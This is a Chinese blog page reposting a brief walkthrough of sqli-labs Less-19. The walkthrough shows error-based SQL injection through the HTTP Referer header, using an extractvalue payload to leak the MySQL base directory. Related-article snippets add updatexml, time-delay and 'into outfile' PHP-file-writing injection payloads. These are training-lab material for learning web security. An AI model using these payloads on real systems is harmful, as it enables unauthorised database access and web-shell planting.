Sqli-labs less 19

最新推荐文章于 2022-04-16 22:01:26 发布

转载最新推荐文章于 2022-04-16 22:01:26 发布 · 110 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/lcamry/p/5763029.html

本文介绍如何在Less-19环境中通过修改HTTP_REFERER进行SQL注入攻击,以揭示MySQL安装路径。文中提供了具体的payload实例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Less-19

从源代码中我们可以看到我们获取到的是HTTP_REFERER

那和less18是基本一致的，我们从referer进行修改。

还是像less18一样，我们只给出一个示例

将referer修改为'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1

可以看到mysql的路径了。

请发散思维思考其他的呦。

转载于:https://www.cnblogs.com/lcamry/p/5763029.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34346099

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

concat mysql sql注入_MySQL注入总结

weixin_32572129的博客

01-12

764

01 MySQL数据库结构及常用函数一、MySQL数据库结构MySQL数据库采用库=>表=>列=>数据的存储结构，这样的存储结构影响着我们后续的注入过程。1. MySQL内置库在MySQL(版本>=5.7)中除了用户自建的如admin等数据库，还有一些MySQL自带的数据库，这些数据库中存储着MySQL的关键信息：库名功能mysql保存有账户信息、权限信息、存储过程等sys...

sqli-labs less-19 less-20 less-22

weixin_74182283的博客

04-02

1213

由于上述所说的cookie原理，一开始是不会有cookie信息的，但登录后，就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数，对其进行攻击，成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数，对其进行攻击，成功得到数据库信息。

参与评论您还未登录，请先登录后发表或查看评论

SQLi-labs（Less-18、Less-19）

weixin_41182861的博客

08-01

246

Less-18 POST - Header Injection - Uagent field - Error based POST头User-Agent注入在页面username、password处都没有发现注入点。查看源代码： // $uagent = $_SERVER['HTTP_USER_AGENT']; #HTTP请求头的User-Agent $IP = $_SERVER['REMOTE_ADDR']; #获取IP //对uname和passwd都做了像Less-17一样的过滤 $un

sqli-lab学习笔记（学习笔记）（11-20）

大方子

08-09

2532

接下来的关卡是post的注入，之前的都是GET型注入所以需要准备这个: firfox+hackbar(firfox的插件) 自己常犯得错： 1.第15关length(database())我会下意识的加上select 变成length(select database()) 2.用变形双注入里面前面是用or连接，不是用union连接 3.17关的update（1,co...

sqli-labs靶场15-19关通关笔记中总结

weixin_45585955的博客

04-16

4039

第十五关本关属于时间注入，基于源码分析，闭合字符是单引号。本关没有错误提示，那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。那这里对 id 进行 ‘ id’ 的处理。本关我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录，不正确的时候这里会延时 5 秒。第十六关

Sqli-labs之Less-18和Less-19

→_→

04-12

4124

Less-18 基于错误的用户代理，头部POST注入（注:这一个模拟的场景是注册登录后的注入）由题意可知，这又是一种新姿势，老方法，查找注入点，发现前面的方法都未成功。且错误回显与正确回显都显示IP：这里写说几个常用请求头：（上一篇文章详细讲过） Host ...

sqli-labs靶场练习笔记

11-09

- **示例**：`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关：基于延迟的...

sqli-labs less1.txt

11-26

sqli-labs less1 sql注入第一题，单引号闭合，详细全程，web注入实验，学习sql注入

sql注入自学笔记报错注入二阶注入布尔时间盲注基于sqli-labs

02-19

下面是基于SQLi-Labs的SQL注入基础知识点：一、报错注入报错注入是指攻击者通过构造特定的SQL语句，让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件： 1. Web应用程序未...

sqli-labs实验指导手册

11-17

3. **基于不同闭合字符的注入**（如less-3和less-4）： - 类似于字符型联合注入，但闭合字符为`)`或`"`，需要相应地调整注入语句。 4. **错误回显注入**（如less-5）： - **利用`updatexml`函数**：即使没有直接...

sqli-labs (less18-less19)

Xi4or0uji

08-01

1822

less 18 头部注入：user_agent 这里不补充http头的知识了，直接看源码可以看到，uname和passwd都有check_input函数检查，所以直接这两个参数注入是不行的了，然后再继续看下去有句sql语句有ip_address和uagent两个参数，而且前面没有检查，可以考虑注入，但是ip一般是数字，比较麻烦，所以决定用uagent注入这里给个脚本，其实重点只是s...

sqli-labs ————less -19

Fly_鹏程万里

05-12

1142

Less-19提交一个测试数据试试：username：adminpassword:aaa由此可以看到出现了Referer，我们不妨来看看源代码：<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...

sqli-lab教程——1-35通关Writeup

热门推荐

地址ch3nye.top

09-11

11万+

刚做sqli-lab的时候，我逛了几个博客论坛没找到什么特别完整的教程，在这里写一篇更完整的教程。本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。一些术语使用错误请见谅。一些题目有多种方法，本人也是在学习当中，我会尽可能补全，但是精力有限，文章不尽完美，请见谅。目录 Page-1(Basic Challenges) Less-1 ...

sqli-labs-master通关之LESS17-LESS19

weixin_43726831的博客

10-10

902

SQL注入之sqli-labs-master LESS17-LESS19 http头部特殊注入点报错型注入 LESS-17 第17关 1.通过WEB页面，是提交形式的登录方式，可以判断交互方式为POST web页面中有提示，[PASSWORD RESET]，密码重置，我们可以猜到，修改密码时数据库的SQL语句为： UPDATE users set password=’$new password...

sqli-labs18、19关详解

weixin_43061418的博客

09-01

2187

18关对两个输入框都进行了设置，所以只能寻找其他注入点看到insert语句从uagents插入我们可以 19关可以看到将uname放在了referer里面就像18关那样去修改Referer里面的就好了

sqli-lab19关基于post的referer报错注入

qq_46527080的博客

12-18

490

知识点 referer： http请求头里，有一个referer首部，这个首部可以告知服务端，当前的请求的来源。就是很直观的说，访问了一个页面，你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数其实就是相当于HTML文件中用标签查找元素一样语法：extractvalue(目标xml文档，xml路径) update是更新 extractvalue是查询第十九关 sqlmap方法：这里我们还是使用SQLMAP进行注入，将登录请求信息保存到1.

有限公司成立合作协议书.doc